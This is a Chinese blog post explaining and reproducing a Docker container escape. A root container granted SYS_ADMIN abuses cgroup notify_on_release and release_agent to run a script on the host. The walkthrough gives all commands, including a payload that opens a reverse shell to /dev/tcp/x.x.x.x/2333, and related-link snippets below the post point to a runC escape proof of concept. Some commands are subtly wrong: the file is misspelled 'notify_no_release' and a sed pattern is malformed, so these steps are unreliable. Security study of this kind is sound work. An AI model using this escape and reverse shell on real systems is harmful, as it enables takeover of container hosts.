Docker逃逸---授权 SYS_ADMIN Capability逃逸原理浅析

已于 2023-10-14 16:41:17 修改
阅读量509 收藏
点赞数
分类专栏: 安全 文章标签: docker 容器 运维 安全
于 2023-10-14 14:38:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CQ17743254852/article/details/133824649
版权

目录

一、产生原因

二、利用条件

三、复现过程

1、容器内挂载宿主机cgroup

2、设置notify_no_release并寻找容器在宿主机上的存储路径

3、将恶意脚本写入release_agent

一、产生原因

给容器额外授权了SYS_ADMIN Cap,并且容器以root权限运行,攻击者拿到容器root权限后可以通过SYS_ADMIN挂载宿主机cgroup,并利用cgroup notify_on_release的特性在宿主机执行shell,从而实现容器逃逸。

CAP_SYS_ADMIN允许执行系统管理任务,如加载或卸载文件系统、设置磁盘配额等

二、利用条件

1、容器以root权限运行;

2、给容器额外授予了SYS_ADMIN Capability;

3、容器没有启用Docker默认的AppArmor配置文件docker-default,或者AppArmor允许运行mount       syscall

其中,条件1和2是必需的,而条件3在某些宿主机上比较容易满足,比如CentOS等Red Hat系统的Linux操作系统上默认没有安装AppArmor。

三、复现过程

1、拉取ubuntu镜像,创建容器

docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu:18.04 bash

操作系统为CentOS系列的默认没有安装 AppArmor,但Ubuntu需要将AppArmor安全选项改为unconfined

2、容器内挂载宿主机cgroup

mkdir /tmp/cgrp
mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x

创建目录cgrp用于挂载

挂载宿主机的memory cgroup到目录cgrp上

为了不影响宿主机,创建子目录x,作为执行目录

3、设置notify_no_release并寻找容器在宿主机上的存储路径

cgroup的每一个subsystem(子目录)都有参数notify_on_release,这个参数值是Boolean型,1或0,分别可以启动和禁用释放代理的指令。

notify_on_release表示是否在cgroup中最后一个任务退出时运行release_agent内的内容

如果值为0:

默认情况下为0,表示不运行

如果值为1:

cgroup下所有task结束的时候,那么内核就会运行root cgroup下release_agent文件中的对应路径的文件

echo 1 > /tmp/cgrp/x/notify_no_release

将 notify_no_release设置为1

host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo $host_path

 查找容器在宿主机上的存储路径

root@2e7113beb0fe:~# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/e7c7a5b3e3c8ea30bf0f8a7ea7d1d04ddbe4b6c29143e2a494e733f00b77e986/diff/cmd

4、将恶意脚本写入release_agent

echo "$host_path/cmd" > /tmp/cgrp/release_agent

在这个目录里创建一个cmd文件,并把它作为/tmp/cgrp/x/release_agent参数指定的文件。

echo '#!/bin/sh' > /cmd
echo "sh -i >& /dev/tcp/x.x.x.x/2333 0>&1" >> /cmd
chmod a+x /cmd

 将恶意shell脚本写入cmd文件

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

最后,POC触发宿主机执行cmd文件中的shell。

该命令启动一个sh进程,将sh进程的PID写入到/tmp/cgrp/x/cgroup.procs里,这里的\$\$表示sh进程的PID。

在执行完sh -c之后,sh进程自动退出,这样cgroup /tmp/cgrp/x里不再包含任何任务,/tmp/cgrp/release_agent文件里的shell将被操作系统内核执行

最后成功反弹shell

Catherines7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Docker 容器逃逸案例分析
yunqishequ1的博客
07-20 5055
摘要: ## 0. 前言 本文参考自《Docker 容器容器云》 这个容器逃逸case 存在于 Docker 1.0 之前的绝大多数版本。 目前使用 Docker 1.0 之前版本的环境几乎不存在了,这篇分析的主要目的是为了加深系统安全方面的学习。 本案例所分析的 PoC 源码地址:[shocker.c](https://github.com/gabrtv/shocker/b 0.
docker-compose-Darwin-x86_64.tgz
03-08
docker-compose 手动安装包
Spring Springmvc整合后项目有关两个ioc容器的问题
qq_20156289的博客
10-06 1227
Spring SpringMVC整合后项目其实存在两个ioc容器 这两个容器的特点: spring和springMVC的容器的关系: spring 容器称为父容器 springMVC 容器称为子容器 外界不能直接访问父容器bean,只能访问子容器bean。 父容器不能访问子容器bean。 子容器能够访问父容器bean。 ...
Docker SYS_ADMIN 容器逃逸原理解析
Jack_chao_的博客
03-27 868
如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。是对全局系统资源的一种封装隔离,使得处于不同 namespace 的进程拥有独立的全局系统资源,改变一个 namespace 中的系统资源只会影响当前 namespace 里的进程,对其他 namespace 中的进程没有影响。namespace是linux内核用来隔离内核资源的方案。
Docker SYS_ADMIN 权限容器逃逸
m0_63306943的博客
03-02 1028
如果notify_on_release启用(即值为1时),当cgroup不再包含任何任务时(即,cgroup的tasks文件里的PID为空时),系统内核会默认执行release_agent参数指定的文件里的内容。若启动docker容器时给主机一个--cap-add=SYS_ADMIN的权限,攻击者可以在容器内通过挂载宿主机cgroup,并利用cgroup notify_on_release的特性在宿主机执行shell,从而实现容器逃逸。cgroup:限制资源分配的技术,限制docker的特定资源。
SYS_ADMIN配置下的容器逃逸复现--cgroup
问题很多的小明
02-15 1972
环境: 当给容器赋予了--cap-add=SYS_ADMIN权限和--security-opt apparmor=unconfined时,可以进行rewrite_cgroup_devices(devices.allow)、ebpf、notify_on_release(挂载cgroup)等多种方式进行逃逸,这里复现以下notify_on_release方式 前提条件:SYS_ADMIN开启;缺少AppArmor;cgroup v1虚拟文件系统必须以读写方式安装在容器内部 root@VM-2-33-..
Docker逃逸---SYS_PTRACE浅析
求大佬师傅带
10-16 1247
Docker逃逸---SYS_PTRACE浅析
centos系统-docker容器逃逸
suo_y的博客
04-20 1341
docker-runc CVE-2019-5736(runC容器逃逸漏洞) 1、准备漏洞环境: curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh && bash install.sh 2、下载poc,编译脚本 a)下载poc:https://github.com/Frichetten/CVE-2019-5736-PoC b)修改payload
docker-compose-Windows-x86_64.exe
12-15
docker-compose 创建并运行 docker-compose up -d 停止docker docker-compose stop 删除docker docker-compose rm --all
docker-compose-Linux-x86_64.zip
03-04
从Github上下载下来的最新1.25.4的docker-compose-Linux-x86_64........
docker-compose-linux-x86_64
09-21
Docker-Compose项目是Docker官方的开源项目,负责实现对Docker容器集群的快速编排。 Docker-Compose将所管理的容器分为三层,分别是工程(project),服务(service)以及容器(container)。Docker-Compose运行...
centos6 安装docker docker-io-1.7.1.rpm docker-engine-1.7.1-1.el6.x86_64.rpm
10-12
centos6 不再支持直接使用yum安装, 可使用rpm包的安装低版本docker方式, docker 1.7.1
docker镜像反推Dockerfile
Merlin's Engineering Blog
05-27 369
在项目运维的过程中,偶尔会遇到某个docker image打包时候的Dockerfile版本管理不善无法与image对应的问题,抑或需要分析某个三方docker image的构建过程,这时,就希望能够通过image反推构建时的instruction.想实现这个过程可以使用一些三方工具比如dive,但是需要额外的安装,其实docker本身也有可用的功能,能帮助我们分析image的构建命令.
Docker基础篇之常用命令
qq_43456605的博客
05-27 986
启动docker: 停止docker: 重启docker: 查看docker 的运行状态: 开机启动: 查看docker该要信息: 查看docker 帮助文档 查看docker命令帮助文档: 同一个仓库源可以有多个Tag版本,代表这个仓库源的不同个版本,我们使用Repository:Tag来定义不同的镜像。 它的options选项说明如下: docker search [options]:远程库中查找某个镜像的名称 它的options选项说明如下: docker pull 某个xxx镜像名字:将
使用dockerfile快速构建一个带ssh的docker镜像
qq_42693842的博客
05-29 250
镜像启动后没有自动启动ssh。需要手动进入镜像启动。
Docker的数据管理(数据卷+数据卷容器
misakivv的博客
05-30 1219
Dcoker的数据管理(数据卷+数据卷容器
docker使用
qq_43907296的博客
05-27 450
能看懂哪个用哪个介绍一:https://cloud.tencent.com/developer/article/2157725 介绍二: docker有两个概念需要知道,一个是镜像,一个是容器docker pull …是从服务端拉取镜像docker run …是选一个镜像制作成容器并运行起来docker stop 容器名:是停止一个容器的运行docker restart 容器名:是重新运行某个容器docker rm 容器名:是删除一个容器docker ps:查看所有运行中的容器docker ps -a
ubuntu离线安装kubesphere(包括docker、harbor)
最新发布
progrmmmm的博客
05-31 901
这边使用虚拟机下载依赖配置环境以及模拟服务器各个节点,使用两个虚拟机模拟离线不联网环境的服务器,使用一个虚拟机联网下载依赖包,然后传入两个不能联网的虚拟机安装所有环境(我这边偷懒就用两个虚拟机中的一个联网下载安装包。再安装到两个虚拟机内了)。
怎么将以下代码转换为yaml文件kubectl create secret docker-registry myregistrykey --docker-server=$DOCKER_REGISTRY_SERVER --docker-username=$DOCKER_USER --docker-password=$DOCKER_PASSWORD --docker-email=$DOCKER_EMAIL
06-02
你可以将以下代码转换为YAML文件: ```yaml apiVersion: v1 kind: Secret metadata: name: myregistrykey type: kubernetes.io/dockerconfigjson data: .dockerconfigjson: <base64-encoded-docker-config-json> ``` 其中,`<base64-encoded-docker-config-json>` 是你的 Docker 配置信息的 Base64 编码。可以通过以下命令获取: ```bash cat ~/.docker/config.json | base64 ``` 然后将输出结果填入 `.dockerconfigjson` 字段中即可。注意,这里的 `type` 必须为 `kubernetes.io/dockerconfigjson`,因为我们要创建一个 Docker 镜像仓库的认证信息 Secret。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值